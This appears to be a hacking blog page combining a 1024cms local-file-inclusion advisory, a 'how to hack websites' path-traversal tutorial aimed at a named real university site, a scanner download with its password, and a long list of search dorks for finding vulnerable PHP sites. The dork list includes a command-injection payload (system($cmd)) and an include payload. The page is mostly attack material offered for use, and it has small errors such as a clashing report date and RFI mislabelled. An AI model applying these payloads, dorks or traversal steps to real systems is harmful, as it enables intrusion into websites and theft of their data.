LFI Vulnerability in 1024cms Admin Control Panel v1.1.0 Beta

========================================================
1024cms Admin Control Panel v1.1.0 Beta (Master-cPanel Package) - 

Local File Include Vulnerability
========================================================
  
Software:             1024cms Admin Control Panel v1.1.0 Beta (master-cpanel package)
Vendor:                http://1024cms.org/
Vuln Type:              Local File Include
Remote:                 Yes
Local:                  No
Discovered by:  QSecure and Demetris Papapetrou 
Website:                http://www.qsecure.com.cy
Discovered:             15/03/2011
Reported:               29/03/2001
Disclosed:


VULNERABILITY DESCRIPTION:
==========================
The script "/index.php" is prone to a local file-include vulnerability because it fails 

to properly sanitize user-supplied input in the "processfile" parameter.

An attacker can exploit this vulnerability to obtain potentially sensitive information 

and execute arbitrary local scripts in the context of the webserver process. This 

may allow the attacker to compromise the application and the underlying computer; 

other attacks are also possible.


PoC Exploit:
============
/index.php?mode=login&processfile=../../../../../../etc/passwd

Read More

How to hack websites using LFI (Local File Inlcusion) A Directory Transversal Attack

What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ?

The ..\ instructs the system to go one directory up. For example, we are at this location C:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing ..\ , we would rech at C:\xx . 

Lets again go at locatio n C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.
Note : Its ..\ on windows and ../ on UNIX like operating syatem.
What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in 'etc' directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.

We do not know the actual names and contents of directories except 'etc' which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing
Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E ) and look for 'etc' but again it will return nothing.
Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to 'etc' directory and show us contents of 'passwd' file.
To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.
Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.
Counter Measures
1. Use the latest web server software 2. Effectively filter the user's input
.................................................................

Read More

Learn How To Hack Websites With LFIntruder (Lfi scanner)

Hi all,
i'd like to share some of my stuff with my blog visitors.It Will Help to scan websites for Lfi(Local File Inclusion)
SnapShot:




Download mirror:
[Warning! This file can include malicious contents which you may not be aware of!] Multiupload.com - upload your files to multiple file hosting sites!

Password: intern0t

Read More

Dork List ForRFI AND LFI

RFI(Local File Inclusion)

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=


inurl:/include/new-visitor.inc.php?lvc_include_dir=


inurl:/_functions.php?prefix=


inurl:/cpcommerce/_functions.php?prefix=


inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=


inurl:/modules/agendax/addevent.inc.php?agendax_path=


inurl:/ashnews.php?pathtoashnews=


inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=


inurl:/pm/lib.inc.php?pm_path=


inurl:/b2-tools/gm-2-b2.php?b2inc=


inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=


inurl:/modules/agendax/addevent.inc.php?agendax_path=


inurl:/includes/include_once.php?include_file=


inurl:/e107/e107_handlers/secure_img_render.php?p=


inurl:/shoutbox/expanded.php?conf=


inurl:/main.php?x=


inurl:/myPHPCalendar/admin.php?cal_dir=


inurl:/index.php/main.php?x=


inurl:/index.php?include=


inurl:/index.php?x=


inurl:/index.php?open=


inurl:/index.php?visualizar=


inurl:/template.php?pagina=


inurl:/index.php?pagina=


inurl:/index.php?inc=


inurl:/includes/include_onde.php?include_file=


inurl:/index.php?page=


inurl:/index.php?pg=


inurl:/index.php?show=


inurl:/index.php?cat=


inurl:/index.php?file=


inurl:/db.php?path_local=


inurl:/index.php?site=


inurl:/htmltonuke.php?filnavn=


inurl:/livehelp/inc/pipe.php?HCL_path=


inurl:/hcl/inc/pipe.php?HCL_path=


inurl:/inc/pipe.php?HCL_path=


inurl:/support/faq/inc/pipe.php?HCL_path=


inurl:/help/faq/inc/pipe.php?HCL_path=


inurl:/helpcenter/inc/pipe.php?HCL_path=


inurl:/live-support/inc/pipe.php?HCL_path=


inurl:/gnu3/index.php?doc=


inurl:/gnu/index.php?doc=


inurl:/phpgwapi/setup/tables_update.inc.php?appdir=


inurl:/forum/install.php?phpbb_root_dir=


inurl:/includes/calendar.php?phpc_root_path=


inurl:/includes/setup.php?phpc_root_path=


inurl:/inc/authform.inc.php?path_pre=


inurl:/include/authform.inc.php?path_pre=


inurl:index.php?nic=


inurl:index.php?sec=


inurl:index.php?content=


inurl:index.php?link=


inurl:index.php?filename=


inurl:index.php?dir=


inurl:index.php?document=


inurl:index.php?view=


inurl:*.php?sel=


inurl:*.php?session=&content=


inurl:*.php?locate=


inurl:*.php?place=


inurl:*.php?layout=


inurl:*.php?go=


inurl:*.php?catch=


inurl:*.php?mode=


inurl:*.php?name=


inurl:*.php?loc=


inurl:*.php?f=


inurl:*.php?inf=


inurl:*.php?pg=


inurl:*.php?load=


inurl:*.php?naam=


allinurl:/index.php?page= site:*.dk


allinurl:/index.php?file= site:*.dk


INURL OR ALLINURL WITH:


/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=


/includes/header.php?systempath=


/Gallery/displayCategory.php?basepath=


/index.inc.php?PATH_Includes=


/ashnews.php?pathtoashnews=


/ashheadlines.php?pathtoashnews=


/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


/demo/includes/init.php?user_inc=


/jaf/index.php?show=


/inc/shows.inc.php?cutepath=


/poll/admin/common.inc.php?base_path=


/pollvote/pollvote.php?pollname=


/sources/post.php?fil_config=


/modules/My_eGallery/public/displayCategory.php?basepath=


/bb_lib/checkdb.inc.php?libpach=


/include/livre_include.php?no_connect=lol&chem_absolu=


/index.php?from_market=Y&pageurl=


/modules/mod_mainmenu.php?mosConfig_absolute_path=


/pivot/modules/module_db.php?pivot_path=


/modules/4nAlbum/public/displayCategory.php?basepath=


/derniers_commentaires.php?rep=


/modules/coppermine/themes/default/theme.php?THEME_DIR=


/modules/coppermine/include/init.inc.php?CPG_M_DIR=


/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=


/coppermine/themes/maze/theme.php?THEME_DIR=


/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=


/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=


/myPHPCalendar/admin.php?cal_dir=


/agendax/addevent.inc.php?agendax_path=


/modules/mod_mainmenu.php?mosConfig_absolute_path=


/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=


/main.php?page=


/default.php?page=


/index.php?action=


/index1.php?p=


/index2.php?x=


/index2.php?content=


/index.php?conteudo=


/index.php?cat=


/include/new-visitor.inc.php?lvc_include_dir=


/modules/agendax/addevent.inc.php?agendax_path=


/shoutbox/expanded.php?conf=


/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


/pivot/modules/module_db.php?pivot_path=


/library/editor/editor.php?root=


/library/lib.php?root=


/e107/e107_handlers/secure_img_render.php?p=


/zentrack/index.php?configFile=


/main.php?x=


/becommunity/community/index.php?pageurl=


/GradeMap/index.php?page=


/index4.php?body=


/side/index.php?side=


/main.php?page=


/es/index.php?action=


/index.php?sec=


/index.php?main=


/index.php?sec=


/index.php?menu=


/html/page.php?page=


/page.php?view=


/index.php?menu=


/main.php?view=


/index.php?page=


/content.php?page=


/main.php?page=


/index.php?x=


/main_site.php?page=


/index.php?L2=


/content.php?page=


/main.php?page=


/index.php?x=


/main_site.php?page=


/index.php?L2=


/index.php?show=


/tutorials/print.php?page=


/index.php?page=


/index.php?level=


/index.php?file=


/index.php?inter_url=


/index.php?page=


/index2.php?menu=


/index.php?level=


/index1.php?main=


/index1.php?nav=


/index1.php?link=


/index2.php?page=


/index.php?myContent=


/index.php?TWC=


/index.php?sec=


/index1.php?main=


/index2.php?page=


/index.php?babInstallPath=


/main.php?body=


/index.php?z=


/main.php?view=


/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


/index.php?file=


/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=




1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=


2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=


4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=


5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


6. allinurl:ihm.php?p=


7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=


8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=


10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=


11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=


12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=


13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=


14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=


15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=


16. allinurl:ihm.php?p=*


14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=


15. allinurl:.php?bodyfile=


16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=


17. allinurl:forums.html
/modules.php?name=


18. allinurl:/default.php?page=home


19. allinurl:/folder.php?id=


20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=


21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


22. allinurl:application.php?base_path=
/application.php?base_path=


23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=


24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=


26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=


27. allinurl:/forum/
/forum/admin/index.php?inc_conf=


28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=


29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=


30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=


31. keyword : "Powered by iUser"
/common.php?include_path=


32. allinurl: "static.php?load="
/static.php?load=


33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=


34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=


35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

LFI(Local File Inclusion)

acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

Read More